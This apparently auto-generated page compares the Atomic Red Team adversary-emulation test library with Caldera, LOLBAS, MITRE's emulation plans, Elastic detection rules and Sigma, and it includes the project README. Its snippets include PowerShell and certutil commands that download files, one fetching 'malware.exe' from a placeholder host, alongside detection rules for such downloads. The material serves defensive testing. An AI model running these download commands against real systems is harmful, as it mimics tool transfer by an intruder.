Convert Figma logo to code with AI

redcanaryco logoatomic-red-team

Small and highly portable detection tests based on MITRE's ATT&CK.

9,540
2,759
9,540
8

Top Related Projects

5,489

Automated Adversary Emulation Platform

6,900

Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.

8,068

Main Sigma Rule Repository

Quick Overview

Atomic Red Team is an open-source library of small, highly portable detection tests mapped to the MITRE ATT&CK framework. It provides a collection of tests that simulate real-world adversary techniques, allowing security teams to validate their detection and prevention capabilities against common attack scenarios.

Pros

  • Comprehensive coverage of MITRE ATT&CK techniques
  • Easy to use and deploy, with minimal setup required
  • Regularly updated with new tests and improvements
  • Supports multiple operating systems (Windows, macOS, Linux)

Cons

  • Some tests may trigger false positives in security tools
  • Requires careful execution in production environments
  • Limited documentation for some advanced use cases
  • May not fully simulate sophisticated, multi-stage attacks

Getting Started

To get started with Atomic Red Team:

  1. Clone the repository:

    git clone https://github.com/redcanaryco/atomic-red-team.git
    
  2. Navigate to the cloned directory:

    cd atomic-red-team
    
  3. Review the available tests in the atomics folder.

  4. Execute a test using the Invoke-AtomicTest PowerShell module:

    Import-Module .\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam.psd1
    Invoke-AtomicTest T1003.001 -TestNumbers 1
    

Note: Ensure you have the necessary permissions and have reviewed the test details before execution. Always use in a controlled environment.

Competitor Comparisons

5,489

Automated Adversary Emulation Platform

Pros of Caldera

  • Offers a more comprehensive and automated approach to adversary emulation
  • Provides a graphical user interface for easier operation and visualization
  • Supports multi-agent operations for complex scenario testing

Cons of Caldera

  • Steeper learning curve due to its complexity
  • Requires more setup and infrastructure compared to Atomic Red Team
  • May be overkill for simple testing scenarios

Code Comparison

Atomic Red Team (PowerShell example):

New-Item -Path "C:\AtomicRedTeam" -ItemType Directory
Set-Location -Path "C:\AtomicRedTeam"
Invoke-WebRequest "https://example.com/malware.exe" -OutFile "malware.exe"

Caldera (YAML ability example):

- id: 43b3754c-def4-4699-a673-1d85648fda6a
  name: Download Malware
  description: Downloads a malicious file
  tactic: execution
  technique:
    attack_id: T1105
    name: Ingress Tool Transfer
  platforms:
    windows:
      psh,pwsh:
        command: |
          Invoke-WebRequest "https://example.com/malware.exe" -OutFile "$env:TEMP\malware.exe"

Both repositories focus on adversary emulation, but Caldera offers a more structured and automated approach with its server-agent model, while Atomic Red Team provides simpler, standalone tests that are easier to implement quickly.

6,900

Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)

Pros of LOLBAS

  • Focused specifically on Living Off the Land Binaries and Scripts (LOLBASes) in Windows environments
  • Provides a comprehensive list of LOLBASes with detailed information on their usage and potential abuse
  • Includes a searchable web interface for easy access to LOLBAS information

Cons of LOLBAS

  • Limited to Windows-specific binaries and scripts
  • Does not provide ready-to-use test cases or automation scripts
  • Primarily a reference resource rather than a testing framework

Code Comparison

LOLBAS example (YAML format):

- Name: Certutil.exe
  Description: Windows command-line program for managing certificates
  Commands:
    - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
      Description: Download and save 7zip to disk
      Usecase: Download file from Internet
      Category: Download

Atomic Red Team example (YAML format):

- name: Download a File with Certutil
  auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
  description: |
    Uses certutil.exe to download a file from the internet.
  supported_platforms:
    - windows
  executor:
    command: |
      certutil.exe -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml test.yaml
    name: command_prompt
    elevation_required: false

An open library of adversary emulation plans designed to empower organizations to test their defenses based on real-world TTPs.

Pros of Adversary Emulation Library

  • Provides comprehensive, end-to-end adversary emulation plans
  • Focuses on specific threat actors and their TTPs
  • Includes detailed technical resources and infrastructure setup guides

Cons of Adversary Emulation Library

  • Less granular, individual tests compared to Atomic Red Team
  • Requires more setup and resources to execute full emulation plans
  • Updates less frequently due to the comprehensive nature of each plan

Code Comparison

Atomic Red Team (PowerShell example):

New-Item -Path $env:TEMP\T1547.001_test.txt -Force

Adversary Emulation Library (Python example):

def create_scheduled_task(task_name, command):
    subprocess.run(["schtasks", "/create", "/tn", task_name, "/tr", command, "/sc", "once", "/st", "00:00"])

The Atomic Red Team example is a simple file creation test, while the Adversary Emulation Library example shows a more complex scheduled task creation function, reflecting the difference in granularity and scope between the two projects.

Pros of Detection Rules

  • Focuses on detection rules for Elastic Security, providing ready-to-use security content
  • Includes a comprehensive set of rules covering various attack techniques and threat actors
  • Offers a rule testing framework for validation and quality assurance

Cons of Detection Rules

  • Limited to Elastic Security ecosystem, less versatile for other platforms
  • Requires Elastic Stack knowledge for optimal use and customization
  • May have a steeper learning curve for users unfamiliar with Elastic products

Code Comparison

Atomic Red Team (PowerShell test):

New-Item -Path $env:TEMP\T1547.001_test.txt -Force
$TargetFile = "C:\Windows\System32\calc.exe"
$ShortcutFile = "$env:USERPROFILE\Desktop\T1547.001_test.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
$Shortcut.TargetPath = $TargetFile
$Shortcut.Save()

Detection Rules (YAML rule):

name: Suspicious Process Creation in User Directory
type: eql
risk_score: 47
description: Detects suspicious process creation in user directories
query: |
  process where event.type == "start" and
    process.executable : ("C:\\Users\\*\\AppData\\*",
                          "C:\\Users\\*\\Downloads\\*")

Summary

Atomic Red Team provides a comprehensive set of tests for various attack techniques, while Detection Rules offers pre-built detection rules specifically for Elastic Security. Atomic Red Team is more versatile and platform-agnostic, whereas Detection Rules is tailored for Elastic Stack users. Both repositories serve different purposes in the security ecosystem, with Atomic Red Team focusing on attack simulation and Detection Rules on threat detection.

8,068

Main Sigma Rule Repository

Pros of Sigma

  • Provides a generic, SIEM-agnostic rule format for describing log events
  • Extensive collection of pre-written detection rules for various attack techniques
  • Supports conversion to multiple SIEM and log management platforms

Cons of Sigma

  • Requires additional tools or converters to implement rules in specific environments
  • May have a steeper learning curve for writing custom rules compared to Atomic Red Team

Code Comparison

Sigma rule example:

title: Suspicious PowerShell Download
detection:
    selection:
        EventID: 4104
        ScriptBlockText|contains:
            - 'Net.WebClient'
            - '.DownloadFile'
    condition: selection

Atomic Red Team test example:

- name: Download Files with PowerShell
  auto_generated_guid: 0ef4a9d4-9815-4c00-a73a-9076fde72489
  description: |
    Use PowerShell to download and write an arbitrary file from the internet
  executor:
    command: |
      (New-Object Net.WebClient).DownloadFile("https://example.com/file.txt", "C:\Windows\Temp\file.txt")

Both repositories focus on different aspects of cybersecurity testing and detection. Sigma provides a standardized format for writing detection rules, while Atomic Red Team offers a framework for simulating specific attack techniques. The choice between them depends on the specific use case and integration requirements of the security team.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Atomic Red Team

GitHub Action Status Atomics GitHub Action Status

Atomic Red Team™ is a library of tests mapped to the MITRE ATT&CK® framework. Security teams can use Atomic Red Team to quickly, portably, and reproducibly test their environments.

Get started

You can execute atomic tests directly from the command line, no installation required. See the Getting started page of our wiki.

For a more robust testing experience, consider using an execution framework like Invoke-Atomic.

Learn more

The Atomic Red Team documentation is available as a wiki.

For information about the philosophy and development of Atomic Red Team, visit our website at https://atomicredteam.io.

Contribute to Atomic Red Team

Atomic Red Team is open source and community developed. If you're interested in becoming a contributor, check out these resources:

  • Join our Slack workspace and get involved with the community. Don't forget to review the code of conduct before you join.
  • Report bugs and request new features by submitting an issue.
  • Read our contribution guide for more information about contributing directly to this repository.
  • Check the license for information regarding the distribution and modification of Atomic Red Team.
  • Contribute to linux atomics quickly from GitHub Codespaces. For more details, click here

Open in GitHub Codespaces